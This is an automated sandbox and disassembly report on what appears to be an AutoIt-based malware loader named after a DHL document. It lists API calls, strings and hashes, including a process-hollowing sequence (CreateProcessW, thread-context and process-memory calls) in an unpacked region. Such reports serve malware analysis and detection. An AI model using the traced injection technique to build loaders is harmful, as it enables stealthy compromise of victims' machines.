• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
• String ID: runas
• API String ID: 448630720-4000483414
• Opcode ID: 26c01338eb2569a36d62f2d8f12bd5b2d2956f6db443ab2f3d82e1b735e58f57
• Instruction ID: b3612dd68635b20a09b0c30cb29662cfe6234770ce8e18ef3c68b44ee27ee3ab
• Opcode Fuzzy Hash: 26c01338eb2569a36d62f2d8f12bd5b2d2956f6db443ab2f3d82e1b735e58f57
• Instruction Fuzzy Hash: 4011D331608345AAD71AFF60DC92DFEB7AC9B91300F44542DF286520A3CFA58A49D712
APIs
• GetInputState.USER32 ref: 0003D807
• timeGetTime.WINMM ref: 0003DA07
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0003DB28
• TranslateMessage.USER32(?), ref: 0003DB7B
• DispatchMessageW.USER32(?), ref: 0003DB89
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0003DB9F
• Sleep.KERNEL32(0000000A), ref: 0003DBB1
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
• String ID:
• API String ID: 2189390790-0
• Opcode ID: 1a01eaea2a8f9afe73e040889512171c357e196380b38e78b3079677997631ba
• Instruction ID: a6669a72be199b162cb4cd41d4cbafad4c8465486da3ff5d9a48b93596a99999
• Opcode Fuzzy Hash: 1a01eaea2a8f9afe73e040889512171c357e196380b38e78b3079677997631ba
• Instruction Fuzzy Hash: 34421370608341EFE73ADF24D884FAAB7E9FF46300F14455AE49687292D774E884CB82

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00033A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00101418,?,00032E7F,?,?,?,00000000), ref: 00033A78
                                                                                        • Part of subcall function 00033357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00033379
                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0003356A
                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0007318D
                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000731CE
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00073210
                                                                                      • _wcslen.LIBCMT ref: 00073277
                                                                                      • _wcslen.LIBCMT ref: 00073286
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$]
                                                                                      • API String ID: 98802146-2783988525
                                                                                      • Opcode ID: b0f3e9f5588cd281a6969adf75de139902f666f6bd01012f83af83a73019eb72
                                                                                      • Instruction ID: ce9a0307795971130691f30337513ce75d2081fc503c0219f6739acdb91eba59
                                                                                      • Opcode Fuzzy Hash: b0f3e9f5588cd281a6969adf75de139902f666f6bd01012f83af83a73019eb72
                                                                                      • Instruction Fuzzy Hash: 4071D4715043019ED305EF65DC85DAFB7E8FF89340F40482EF5899B1A2EBB49A88CB52

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00032D07
                                                                                      • RegisterClassExW.USER32(00000030), ref: 00032D31
                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00032D42
                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00032D5F
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00032D6F
                                                                                      • LoadIconW.USER32(000000A9), ref: 00032D85
                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00032D94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                      • API String ID: 2914291525-1005189915
                                                                                      • Opcode ID: 0df3783e2a1b2293c22f4158df71090d130e662a22a76c63718acfcbd84053c1
                                                                                      • Instruction ID: 4bf72cf3bf39901996169f965aa2a792f9927ed7d1f95d6b22e89c4d6d0f5753
                                                                                      • Opcode Fuzzy Hash: 0df3783e2a1b2293c22f4158df71090d130e662a22a76c63718acfcbd84053c1
                                                                                      • Instruction Fuzzy Hash: 6C21EFB1D01308AFEB00DFA4E889F9DBBB4FB08704F10811AF655AA6A0D7B90580CF91

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 0007039A: CreateFileW.KERNELBASE(00000000,00000000,?,00070704,?,?,00000000,?,00070704,00000000,0000000C), ref: 000703B7
                                                                                      • GetLastError.KERNEL32 ref: 0007076F
                                                                                      • __dosmaperr.LIBCMT ref: 00070776
                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00070782
                                                                                      • GetLastError.KERNEL32 ref: 0007078C
                                                                                      • __dosmaperr.LIBCMT ref: 00070795
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000707B5
                                                                                      • CloseHandle.KERNEL32(?), ref: 000708FF
                                                                                      • GetLastError.KERNEL32 ref: 00070931
                                                                                      • __dosmaperr.LIBCMT ref: 00070938
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                      • String ID: H
                                                                                      • API String ID: 4237864984-2852464175
                                                                                      • Opcode ID: 9b7b801186cf6d730534640c23318333462c1404042e55be7e6722558444fbda
                                                                                      • Instruction ID: fa726f59b53b6d2206048bbe8ad249dcafc65ce9e29808d9753e5efb6f17c705
                                                                                      • Opcode Fuzzy Hash: 9b7b801186cf6d730534640c23318333462c1404042e55be7e6722558444fbda
                                                                                      • Instruction Fuzzy Hash: FCA13632E14145CFDF19AF68DC51BAE3BE0AB06320F14825DF8599B392CB399D12CB95

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00032B8E
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00032B9D
                                                                                      • LoadIconW.USER32(00000063), ref: 00032BB3
                                                                                      • LoadIconW.USER32(000000A4), ref: 00032BC5
                                                                                      • LoadIconW.USER32(000000A2), ref: 00032BD7
                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00032BEF
                                                                                      • RegisterClassExW.USER32(?), ref: 00032C40
                                                                                        • Part of subcall function 00032CD4: GetSysColorBrush.USER32(0000000F), ref: 00032D07
                                                                                        • Part of subcall function 00032CD4: RegisterClassExW.USER32(00000030), ref: 00032D31
                                                                                        • Part of subcall function 00032CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00032D42
                                                                                        • Part of subcall function 00032CD4: InitCommonControlsEx.COMCTL32(?), ref: 00032D5F
                                                                                        • Part of subcall function 00032CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00032D6F
                                                                                        • Part of subcall function 00032CD4: LoadIconW.USER32(000000A9), ref: 00032D85
                                                                                        • Part of subcall function 00032CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00032D94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                      • String ID: #$0$AutoIt v3
                                                                                      • API String ID: 423443420-4155596026
                                                                                      • Opcode ID: 03e5510eb6c2ab133b740f23610c8b17c7556e3263f66d1543759a03a4e249da
                                                                                      • Instruction ID: bb108381398789bc5f55446103ec3de5fbed9f83fab81ddc65a00a6f0bd037f6
                                                                                      • Opcode Fuzzy Hash: 03e5510eb6c2ab133b740f23610c8b17c7556e3263f66d1543759a03a4e249da
                                                                                      • Instruction Fuzzy Hash: D9211A70E10314BBEB109FA5EC59EA97FF4FB48B60F04011AF544AAAA0D7F94580DF90

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0003316A,?,?), ref: 000331D8
                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,0003316A,?,?), ref: 00033204
                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00033227
                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0003316A,?,?), ref: 00033232
                                                                                      • CreatePopupMenu.USER32 ref: 00033246
                                                                                      • PostQuitMessage.USER32(00000000), ref: 00033267
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                      • String ID: TaskbarCreated
                                                                                      • API String ID: 129472671-2362178303
                                                                                      • Opcode ID: 83b9cfc4e039b1c6e94e70ff9ac0e468b4cccbbe290988c0f1ea91866748836a
                                                                                      • Instruction ID: db750c1197e4bf579c0d9d6f71e4ec79259d06a7072dcb1c3a4ded07151caa17
                                                                                      • Opcode Fuzzy Hash: 83b9cfc4e039b1c6e94e70ff9ac0e468b4cccbbe290988c0f1ea91866748836a
                                                                                      • Instruction Fuzzy Hash: 3C417B31604200BBEB361B78DD8DFBE3A9DF705314F044125F94A9A5E2CBBC8E8097A5

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0117B001
                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0117B227
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileFreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 204039940-0
                                                                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                      • Instruction ID: df6245a5323279507b6c158a50f34ff5f7cc52c6450d91f6151446b76ec1f4bb
                                                                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                      • Instruction Fuzzy Hash: 63A11874E04209EBDB18CFA4D894BEEBBB5FF48304F208559E211BB380D7759A81CB95

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00031BF4
                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00031BFC
                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00031C07
                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00031C12
                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00031C1A
                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00031C22
                                                                                        • Part of subcall function 00031B4A: RegisterWindowMessageW.USER32(00000004,?,000312C4), ref: 00031BA2
                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0003136A
                                                                                      • OleInitialize.OLE32 ref: 00031388
                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 000724AB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                      • String ID: $0i$`
                                                                                      • API String ID: 1986988660-1920216020
                                                                                      • Opcode ID: fd85bd33c1df2d9d0f213b40928aad9b2963d226eda421b493c45578a1e4aca2
                                                                                      • Instruction ID: adebd1933317dabbf69f7c1e73af58d23cb3b17d076f0fa0e7f4a99294e1ac8b
                                                                                      • Opcode Fuzzy Hash: fd85bd33c1df2d9d0f213b40928aad9b2963d226eda421b493c45578a1e4aca2
                                                                                      • Instruction Fuzzy Hash: CA71A2B4901200AFD385DF79ED45A953AE5FB8A340754812EE0CADBAB2EBFC4581CF41

                                                                                      Control-flow Graph (rendered graph not included): 32c63-32cd3, CreateWindowExW * 2, ShowWindow * 2
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00032C91
                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00032CB2
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00031CAD,?), ref: 00032CC6
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00031CAD,?), ref: 00032CCF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CreateShow
                                                                                      • String ID: AutoIt v3$edit
                                                                                      • API String ID: 1584632944-3779509399
                                                                                      • Opcode ID: 78c5d2abaf06eaf68bb65a583cfa2785917e04fcd31451cca0bc2177e9b5d0fd
                                                                                      • Instruction ID: 6845dfbea31787348dc91c0bdc516c72a14f93ceb97e91f6744dcaeced51df53
                                                                                      • Opcode Fuzzy Hash: 78c5d2abaf06eaf68bb65a583cfa2785917e04fcd31451cca0bc2177e9b5d0fd
                                                                                      • Instruction Fuzzy Hash: F4F0DA755403907AFB311717AC0CE773EBDE7C6F60B00105EF944AA9A0C6B91891DAB0

                                                                                      Control-flow Graph (rendered graph and edge list not included): 117acf0-117ae24, call 1178940, call 117abe0, CreateFileW; later blocks call VirtualAlloc, ReadFile, call 117ac20, call 1179be0, call 117ac70, ExitProcess
                                                                                      APIs
                                                                                        • Part of subcall function 0117ABE0: Sleep.KERNELBASE(000001F4), ref: 0117ABF1
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0117AE1A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileSleep
                                                                                      • String ID: 30EX1A2834LH8IHN9E32II6H4
                                                                                      • API String ID: 2694422964-3492477750
                                                                                      • Opcode ID: 650a75e4d60e5522dfaa048c4c2bca06e46b035afced6525dff720bb5ea395cc
                                                                                      • Instruction ID: 7b641319c1d30517a0b1c08c6d4de0d794eee0a80d5526fdca845d8cc5815347
                                                                                      • Opcode Fuzzy Hash: 650a75e4d60e5522dfaa048c4c2bca06e46b035afced6525dff720bb5ea395cc
                                                                                      • Instruction Fuzzy Hash: 1A51B630D04298DAEF16D7F8D814BEEBB78AF15304F044599E2447B2C1CBB90B49CBA5

                                                                                      Control-flow Graph (rendered graph and edge list not included): 33b1c-33b27; blocks call RegOpenKeyExW, RegQueryValueExW, RegCloseKey
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B40
                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B61
                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Control Panel\Mouse
                                                                                      • API String ID: 3677997916-824357125
                                                                                      • Opcode ID: 3f5404f8c4f530ba5e77353ebea98b95d2b9230cbaf638e4313cfb4b4b22c779
                                                                                      • Instruction ID: bb1aa22a2cd16c450adb9287a077885d5099cc7f7ab5b7ab6c21787d93d3e2bc
                                                                                      • Opcode Fuzzy Hash: 3f5404f8c4f530ba5e77353ebea98b95d2b9230cbaf638e4313cfb4b4b22c779
                                                                                      • Instruction Fuzzy Hash: AD112AB5510208FFEB618FA5DC84EAEB7BCEF44744F104459EA05D7110D3319E409760

                                                                                      Control-flow Graph (rendered graph and edge list not included): 1179be0-1179c80, call 117c070 * 3; later blocks call CreateProcessW, Wow64GetThreadContext, ReadProcessMemory, call 117b6f0, call 117b830, call 117b640, call 117c090, call 117b240, Wow64SetThreadContext, call 117b570
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0117A39B
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0117A431
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0117A453
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                                      • Instruction ID: ba81e7b3ae91f1cdb9708352fd172733ac9f06a1a7a74fda1b4de4fddc0c6674
                                                                                      • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                                      • Instruction Fuzzy Hash: 29621E30A14658DBEB28CFA4D850BDEB772EF58300F1491A9D10DEB390E7769E81CB59
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000733A2
                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00033A04
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                                      • String ID: Line:
                                                                                      • API String ID: 2289894680-1585850449
                                                                                      • Opcode ID: 028af89b1ecc6f1d8e2a1d5910f1dcfcc60d09dbe66ac8e35c1700b7a2499530
                                                                                      • Instruction ID: 9ef8acbd347189736d6710782c6bfb898bf6c7fb6d57c21a4cd4c96068b0faf3
                                                                                      • Opcode Fuzzy Hash: 028af89b1ecc6f1d8e2a1d5910f1dcfcc60d09dbe66ac8e35c1700b7a2499530
                                                                                      • Instruction Fuzzy Hash: 0531C271408304AAD326EB20DC85BEFB7DCAB45720F00892EF5D996092DBB49788C7D2
                                                                                      APIs
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00050668
                                                                                        • Part of subcall function 000532A4: RaiseException.KERNEL32(?,?,?,0005068A,?,00101444,?,?,?,?,?,?,0005068A,00031129,000F8738,00031129), ref: 00053304
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00050685
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                      • String ID: Unknown exception
                                                                                      • API String ID: 3476068407-410509341
                                                                                      • Opcode ID: b4409ccc2c68503764fe6ded738dd13c56cc48f85e12c104f6e2ab8cbf341d24
                                                                                      • Instruction ID: 490397f070c6710fc93f0b5b62357c669dbb14332d447795f247fca2d340b7df
                                                                                      • Opcode Fuzzy Hash: b4409ccc2c68503764fe6ded738dd13c56cc48f85e12c104f6e2ab8cbf341d24
                                                                                      • Instruction Fuzzy Hash: A9F0C23490070EB7CB00BAA4D84ADEF77AD5F00351B604531BD14DA992EF71EA6DC695
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 000B82F5
                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 000B82FC
                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 000B84DD
